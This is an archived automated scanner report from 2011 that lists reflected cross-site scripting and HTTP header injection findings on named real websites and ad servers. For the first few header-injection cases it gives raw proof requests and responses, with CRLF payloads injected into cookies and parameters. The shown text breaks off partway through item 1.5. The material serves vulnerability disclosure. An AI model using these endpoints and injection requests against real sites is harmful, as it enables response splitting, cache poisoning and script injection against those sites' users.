CWE-79, XSS, DORK Report, Cross Site Scripting, HTTP Header Injection

DORK CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 08:50:20 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. HTTP header injection

1.1. http://amch.questionmarket.com/adsc/d851369/20/40646337/decide.php [ES cookie]

1.2. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.3. http://amch.questionmarket.com/adscgen/st.php [site parameter]

1.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

1.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

1.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

1.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

1.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

1.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.11. http://us.ebayobjects.com/1ai/ebay.ebayus.58058/networking_and_communications [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.2. http://api.facebook.com/restserver.php [method parameter]

2.3. http://api.facebook.com/restserver.php [urls parameter]

2.4. http://api.viglink.com/api/ping [key parameter]

2.5. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.6. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.7. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.8. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.9. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.10. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.11. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.12. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]

2.13. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]

2.14. http://digg.com/remote-submit [REST URL parameter 1]

2.15. http://digg.com/submit [REST URL parameter 1]

2.16. http://hubpages.com/ [name of an arbitrarily supplied request parameter]

2.17. http://hubpages.com/about/advertise [REST URL parameter 1]

2.18. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]

2.19. http://hubpages.com/hubs/hot/ [REST URL parameter 1]

2.20. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]

2.21. http://hubpages.com/my/hubs/stats [REST URL parameter 1]

2.22. http://hubpages.com/my/hubs/stats [REST URL parameter 2]

2.23. http://hubpages.com/my/hubs/stats [REST URL parameter 3]

2.24. http://hubpages.com/signin/ [REST URL parameter 1]

2.25. http://hubpages.com/topics/ [REST URL parameter 1]

2.26. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]

2.27. http://hubpages.com/tour/affiliate [REST URL parameter 1]

2.28. http://hubpages.com/tour/affiliate [REST URL parameter 2]

2.29. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]

2.30. http://hubpages.com/user/new/ [REST URL parameter 1]

2.31. http://hubpages.com/user/new/ [REST URL parameter 2]

2.32. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]

2.33. https://hubpages.com/signin/ [REST URL parameter 1]

2.34. https://hubpages.com/signin/ [REST URL parameter 1]

2.35. https://hubpages.com/signin/ [explain parameter]

2.36. https://hubpages.com/signin/ [explain parameter]

2.37. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]

2.38. https://hubpages.com/signin/ [s parameter]

2.39. https://hubpages.com/signin/ [s parameter]

2.40. https://hubpages.com/signin/ [url parameter]

2.41. https://hubpages.com/signin/ [url parameter]

2.42. https://hubpages.com/signin/reset/ [REST URL parameter 1]

2.43. https://hubpages.com/signin/reset/ [REST URL parameter 1]

2.44. https://hubpages.com/signin/reset/ [REST URL parameter 2]

2.45. https://hubpages.com/signin/reset/ [REST URL parameter 2]

2.46. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]

2.47. http://otakubooty.com/Default.asp [login parameter]

2.48. http://otakubooty.com/Default.asp [login parameter]

2.49. http://otakubooty.com/Default.asp [name of an arbitrarily supplied request parameter]

2.50. http://otakubooty.com/oa.asp [name of an arbitrarily supplied request parameter]

2.51. http://otakubooty.com/of.asp [name of an arbitrarily supplied request parameter]

2.52. http://otakubooty.com/otaku_help.asp [name of an arbitrarily supplied request parameter]

2.53. http://otakubooty.com/otaku_help.asp [tab parameter]

2.54. http://otakubooty.com/otaku_news.asp [name of an arbitrarily supplied request parameter]

2.55. http://otakubooty.com/otaku_search.asp [name of an arbitrarily supplied request parameter]

2.56. http://otakubooty.com/otaku_signup.asp [name of an arbitrarily supplied request parameter]

2.57. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]

2.58. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]

2.59. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]

2.60. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]

2.61. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]

2.62. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]

2.63. http://rover.ebay.com/idmap/0 [footer&cb parameter]

2.64. http://tags.bluekai.com/site/50 [phint parameter]

2.65. http://widgets.digg.com/buttons/count [url parameter]

2.66. http://wine.com/ScriptResource.axd [Lo0P parameter]

2.67. http://wine.com/i-js.js [Lo0P parameter]

2.68. http://wine.com/includes/analytics/s_remote_code.js [Lo0P parameter]

2.69. http://www.floristexpress.net/ [refcode parameter]

2.70. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

2.71. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

2.72. http://www.wine.com/favicon.ico [REST URL parameter 1]

2.73. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 1]

2.74. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 2]

2.75. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 3]

2.76. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 1]

2.77. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 2]

2.78. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 3]

2.79. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 1]

2.80. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 2]

2.81. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 3]

2.82. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 1]

2.83. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 2]

2.84. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 3]

2.85. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspx [REST URL parameter 3]

2.86. http://www.wine.com/v6/giftcenter/proflowersproduct.aspx [REST URL parameter 3]

2.87. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [Referer HTTP header]

2.88. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [Referer HTTP header]

2.89. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [Referer HTTP header]

2.90. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [Referer HTTP header]

2.91. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [Referer HTTP header]

2.92. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [Referer HTTP header]

2.93. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [Referer HTTP header]

2.94. http://tags.bluekai.com/site/50 [Referer HTTP header]

2.95. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.96. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

2.97. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.98. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.99. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

2.100. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

2.101. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

2.102. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

2.103. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

2.104. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

2.105. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

2.106. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

2.107. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

2.108. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

2.109. http://ar.voicefive.com/bmx3/node_hulu.pli [UID cookie]

2.110. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

2.111. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p45555483 cookie]

2.112. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p67161473 cookie]

2.113. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p83612734 cookie]

2.114. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p85001580 cookie]

2.115. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [PFC_BrowserId cookie]

2.116. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]

2.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]

2.118. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [PFC_BrowserId cookie]

2.119. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [PFC_BrowserId cookie]

2.120. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [PFC_BrowserId cookie]

2.121. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [PFC_BrowserId cookie]

2.122. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [PFC_BrowserId cookie]

2.123. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [PFC_BrowserId cookie]

2.124. http://www.floristexpress.net/ [ref_code cookie]

2.125. http://www.floristexpress.net/ [ref_code cookie]

2.126. http://www.floristexpress.net/comeback.htm [ref_code cookie]

2.127. http://www.floristexpress.net/comeback.htm [ref_code cookie]

2.128. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]

2.129. http://www.floristexpress.net/search.htm [ref_code cookie]

2.130. http://www.floristexpress.net/search.htm [ref_code cookie]



1. HTTP header injection  next
There are 11 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.



1.1. http://amch.questionmarket.com/adsc/d851369/20/40646337/decide.php [ES cookie]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d851369/20/40646337/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 385e1%0d%0a1ad6393d34c was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d851369/20/40646337/decide.php?ord=1297607125 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2; ES=385e1%0d%0a1ad6393d34c

Response

HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 14:29:56 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Sat, 13-Feb-2010 14:29:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-1; expires=Thu, 05-Apr-2012 06:29:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=385e1
1ad6393d34c
_851369-l8luM-0; expires=Thu, 05-Apr-2012 06:29:56 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.2. http://amch.questionmarket.com/adscgen/st.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 1a15a%0d%0a7b6ce45e099 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=851369&site=59899979&code=406463251a15a%0d%0a7b6ce45e099&randnum=3683655 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_851369-G1vtM-FH_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q

Response

HTTP/1.1 302 Found
Date: Sun, 13 Feb 2011 14:29:29 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Sat, 13-Feb-2010 14:29:28 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_851369-1-1; expires=Thu, 05-Apr-2012 06:29:29 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q_851369-G1vtM-47@; expires=Thu, 05-Apr-2012 06:29:29 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=851369&site=20-59899979-&code=406463251a15a
7b6ce45e099

Content-Length: 0
Content-Type: text/html


1.3. http://amch.questionmarket.com/adscgen/st.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 5829f%0d%0a230f90016ee was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=851369&site=598999795829f%0d%0a230f90016ee&code=40646325&randnum=3683655 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_851369-G1vtM-FH_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q

Response

HTTP/1.1 302 Found
Date: Sun, 13 Feb 2011 14:29:25 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sat, 13-Feb-2010 14:29:24 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_851369-1-1; expires=Thu, 05-Apr-2012 06:29:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_822109-|RIsM-oGr1_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_852149-*jtsM-B])1_851769-a(duM-q_851369-G1vtM-07@; expires=Thu, 05-Apr-2012 06:29:25 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=851369&site=-1-598999795829f
230f90016ee
-&code=40646325
Content-Length: 0
Content-Type: text/html


1.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload 22625%0d%0a1191c28caf6 was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=10.2154&wmpv=0&res=128&bwVal=22625%0d%0a1191c28caf6&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=22625
1191c28caf6
&BWDate=40587.404919&debuglevel=&FLV=10.2154&RES=128&WMPV=0; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 41419%0d%0ae7ec5e7748f was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2204319&PluID=0&w=728&h=90&ord=143484280500666882&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=143484280500666882&mt_id=109450&mt_adid=100341&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?axEWAN5XFAA1TX4AAAAAAP9.HwAAAAAAAAAAAAYAAAAAAA8AAgAGDW98IAAAAAAA.K4ZAAAAAADDeikAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW3AwAAAAAAAIAAwAAAAAA001iEFg5.D89CtejcD0KQKRwPQrXowFAZmZmZmZmEECkcD0K16MBQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMoVFbgWGeCRAbs.2Ej.WHJd9LdYf9A7DVvjx8AAAAAA==,,http%3A%2F%2Fhubpages.com%2Fhubs%2Fhot%2F,Z%3D728x90%26s%3D1333214%26_salt%3D2951543907%26B%3D10%26u%3Dhttp%253A%252F%252Fhubpages.com%252Fhubs%252Fhot%252F%26r%3D0,0e707dc2-360b-11e0-96c5-003048d44840
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=041419%0d%0ae7ec5e7748f; A3=gPVtafzY0bnA00001gSdsafy50aSU00003gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000Sf+JvabEk02WG00002fFb9afAF02WG00001gNfHaaiN0aVX00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeaf5V0c9M00001gy3.ach00c9M00001cRreabeg03Dk00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXhaf5V0c9M00003gK8raeXe0aA900001gSdmafy60aSU00002heXiafvG0c9M00003heXjafWs0c9M00001gSdnafwN0aSU00003gCTVa9bU0c9M00001hbwIaeVY09SF00002gSdpafvK0aSU00001heXaaf9P0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001ge4Hack+0bM000001; 